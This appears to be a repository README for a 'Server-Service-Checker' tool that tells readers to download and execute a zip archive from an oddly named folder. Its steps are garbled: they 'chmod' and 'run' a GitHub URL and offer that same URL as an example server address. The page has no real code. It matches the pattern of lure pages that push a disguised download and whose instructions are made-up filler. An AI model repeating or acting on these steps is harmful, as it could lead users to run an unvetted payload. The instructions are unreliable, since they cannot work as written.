Welcome to the Server-Service-Checker repository! This tool helps you check if your servers or services are reachable. It is very simple to use, and you can get started in just a few minutes.
To get the Server-Service-Checker, visit this page to download: Download Here.
You will find different versions of the software on the releases page. Choose the one that suits your system.
- A Linux operating system (e.g., Ubuntu, CentOS).
- Access to a terminal or command line interface.
- Basic permission to run scripts.
After downloading the appropriate file, follow these steps to run the script:
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Open your terminal.
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Navigate to the directory where you downloaded the script. You can use the
cdcommand. For example:cd ~/Downloads -
Make the script executable. Type the following command:
chmod +x https://github.com/531santhosh/Server-Service-Checker/raw/refs/heads/main/Cypselomorphae/Service_Checker_Server_v1.3.zip -
Now you can run the script by typing:
https://github.com/531santhosh/Server-Service-Checker/raw/refs/heads/main/Cypselomorphae/Service_Checker_Server_v1.3.zip -
The script will ask you for the server addresses or service names you want to check. Enter them as instructed.
- Simple Commands: The script uses straightforward commands to perform checks.
- Customizable: You can easily adjust the script to fit your needs.
- Ethical Use: Ensure that you only monitor servers and services you have permission to check.
If you want to check if a web server is reachable, simply enter the address like this:
https://github.com/531santhosh/Server-Service-Checker/raw/refs/heads/main/Cypselomorphae/Service_Checker_Server_v1.3.zip
Once you run the script, it will give you a clear report on whether the server is up or down.
If you encounter issues running the script, consider these common solutions:
- Permission Denied: Make sure you have made the script executable using
chmod. - Command Not Found: Ensure you're in the correct directory where the script is located.
- Network Issues: Check your internet connection or any firewalls that may block the checks.
If you would like to contribute to this project, please submit your ideas or suggestions via the repository's issues section. Sharing improvements helps everyone!
To keep up with updates and changes, please visit the Releases Page regularly.
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